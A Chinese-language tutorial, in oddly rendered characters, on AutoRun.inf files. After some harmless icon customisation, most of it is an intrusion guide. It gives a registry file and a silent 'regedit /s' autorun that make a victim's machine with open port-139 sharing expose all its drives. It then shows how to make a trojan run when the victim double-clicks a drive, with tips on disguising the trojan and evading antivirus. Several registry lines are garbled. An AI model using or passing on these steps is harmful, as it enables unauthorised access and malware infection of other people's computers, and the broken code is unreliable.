最近網(wǎng)上流行通過(guò)AutoRun.inf文件使對(duì)方所有的硬盤完全共享或中木馬的方法，由于AutoRun.inf文件在黑客技術(shù)中的應(yīng)用還是很少見(jiàn)的，相應(yīng)的資料也不多，有很多人對(duì)此覺(jué)得很神秘，本文試圖為您解開(kāi)這個(gè)迷，使您能完全的了解這個(gè)并不復(fù)雜卻極其有趣的技術(shù)。

　　一、理論基礎(chǔ)

　　經(jīng)常使用光盤的朋友都知道，有很多光盤放入光驅(qū)就會(huì)自動(dòng)運(yùn)行，它們是怎么做的呢？光盤一放入光驅(qū)就會(huì)自動(dòng)被執(zhí)行，主要依靠?jī)蓚€(gè)文件，一是光盤上的AutoRun.inf文件，另一個(gè)是操作系統(tǒng)本身的系統(tǒng)文件之一的Cdvsd.vxd。Cdvsd.vxd會(huì)隨時(shí)偵測(cè)光驅(qū)中是否有放入光盤的動(dòng)作，如果有的話，便開(kāi)始尋找光盤根目錄下的AutoRun.inf文件。如果存在AutoRun.inf文件則執(zhí)行它里面的預(yù)設(shè)程序。

　　AutoRun.inf不光能讓光盤自動(dòng)運(yùn)行程序，也能讓硬盤自動(dòng)運(yùn)行程序，方法很簡(jiǎn)單，先打開(kāi)記事本，然后用鼠標(biāo)右鍵點(diǎn)擊該文件，在彈出菜單中選擇“重命名”，將其改名為AutoRun.inf，在AutoRun.inf中鍵入以下內(nèi)容：[AutoRun]//表示AutoRun部分開(kāi)始，必須輸入Icon=C:C.ico//給C盤一個(gè)個(gè)性化的盤符圖標(biāo)C.icoOpen=C:1.exe//指定要運(yùn)行程序的路徑和名稱，在此假設(shè)為C盤下的1.exe保存該文件，按F5刷新桌面，再看“我的電腦”中的該盤符（在此為C盤），你會(huì)發(fā)現(xiàn)它的磁盤圖標(biāo)變了，雙擊進(jìn)入C盤，還會(huì)自動(dòng)播放C盤下的1.exe文件！

　　解釋一下：“[AutoRun]”行是必須的固定格式，“Icon”行對(duì)應(yīng)的是圖標(biāo)文件，“C:C.ico”為圖標(biāo)文件路徑和文件名，你在輸入時(shí)可以將它改為你的圖片文件所在路徑和文件名。另外，“.ico”為圖標(biāo)文件的擴(kuò)展名，如果你手頭上沒(méi)有這類文件，可以用看圖軟件ACDSee將其他格式的軟件轉(zhuǎn)換為ico格式，或者找到一個(gè)后綴名為BMP的文件，將它直接改名為ICO文件即可。

　　“Open”行指定要自動(dòng)運(yùn)行的文件及其盤符和路徑。要特別說(shuō)明的是，如果你要改變的硬盤跟目錄下沒(méi)有自動(dòng)播放文件，就應(yīng)該把“OPEN”行刪掉，否則就會(huì)因?yàn)檎也坏阶詣?dòng)播放文件而打不開(kāi)硬盤，此時(shí)只能用鼠標(biāo)右鍵單擊盤符在彈出菜單中選“打開(kāi)”才行。

　　二、實(shí)例

　　下面就舉個(gè)例子：如果你掃到一臺(tái)開(kāi)著139共享的機(jī)器，而對(duì)方只完全共享了D盤，我們要讓對(duì)方的所有驅(qū)動(dòng)器都共享。首先編輯一個(gè)注冊(cè)表文件，打開(kāi)記事本，鍵入以下內(nèi)容：

　　REGEDIT4

　　'此處一定要空一行

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanC$]

　　"ath"="C:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanD$]

　　"ath"="D:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanC$]

　　"ath"="E:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　以上我只設(shè)置到E盤，如果對(duì)方有很多邏輯盤符的請(qǐng)自行設(shè)置。將以上部分另存為Share.reg文件備用。要特別注意REGEDIT4為大寫且頂格書寫，其后要空上一行，在最后一行記得要按一次回車鍵。

　　然后打開(kāi)記事本，編制一個(gè)AutoRun.inf文件，鍵入以下內(nèi)容：

　　[AutoRun]

　　Open=regedit/sShare.reg//加/s參數(shù)是為了導(dǎo)入時(shí)不會(huì)顯示任何信息保存AutoRun.inf文件。將Share.reg和AutoRun.inf這兩個(gè)文件都復(fù)制到對(duì)方的D盤的根目錄下，這樣對(duì)方只要雙擊D盤就會(huì)將Share.reg導(dǎo)入注冊(cè)表，這樣對(duì)方電腦重啟后所有驅(qū)動(dòng)器就會(huì)都完全共享出來(lái)。

　　如果想讓對(duì)方中木馬，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木馬服務(wù)端文件名”，然后把AutoRun.inf和配置好的木馬服務(wù)端一起復(fù)制到對(duì)方D盤的根目錄下，這樣不需對(duì)方運(yùn)行木馬服務(wù)端程序，而只需他雙擊D盤就會(huì)使木馬運(yùn)行！這樣做的好處顯而易見(jiàn)，那就是大大的增加了木馬運(yùn)行的主動(dòng)性！須知許多人現(xiàn)在都是非常警惕的，不熟悉的文件他們輕易的不會(huì)運(yùn)行，而這種方法就很難防范了。

　　要說(shuō)明的是，給你下木馬的人不會(huì)那么蠢的不給木馬加以偽裝，一般說(shuō)來(lái)，他們會(huì)給木馬服務(wù)端文件改個(gè)名字，或好聽(tīng)或和系統(tǒng)文件名很相像，然后給木馬換個(gè)圖標(biāo)，使它看起來(lái)像TXT文件、ZIP文件或圖片文件等，，最后修改木馬的資源文件使其不被殺毒軟件識(shí)別（具體的方法可以看網(wǎng)上的文章），當(dāng)服務(wù)端用戶信以為真時(shí)，木馬卻悄悄侵入了系統(tǒng)。其實(shí)，換個(gè)角度理解就不難了——要是您給別人下木馬我想你也會(huì)這樣做的。以上手段再輔以如上內(nèi)容的AutoRun.inf文件就天衣無(wú)縫了！

　　請(qǐng)大家注意：保存的文件名必須是“AutoRun.inf”，編制好的Autorun.inf文件和圖標(biāo)文件一定要放在硬盤根目錄下。更進(jìn)一步，如果你的某個(gè)硬盤內(nèi)容暫時(shí)比較固定的話，不妨用Flash做一個(gè)自動(dòng)播放文件，再編上“Autorun”文件，那你就有最酷、最個(gè)性的硬盤了。

　　到這兒還沒(méi)有完。大家知道，在一些光盤放入后，我們?cè)谄鋱D標(biāo)上單擊鼠標(biāo)右鍵，還會(huì)產(chǎn)生一個(gè)具有特色的目錄菜單，如果能對(duì)著我們的硬盤點(diǎn)擊鼠標(biāo)右鍵也產(chǎn)生這樣的效果，那將更加的有特色。其實(shí)，光盤能有這樣的效果也僅僅是因?yàn)樵贏utoRun.inf文件中有如下兩條語(yǔ)句：

　　shell標(biāo)志＝顯示的鼠標(biāo)右鍵菜單中內(nèi)容

　　shell標(biāo)志command＝要執(zhí)行的文件或命令行

　　所以，要讓硬盤具有特色的目錄菜單，在AutoRun.inf文件中加入上述語(yǔ)句即可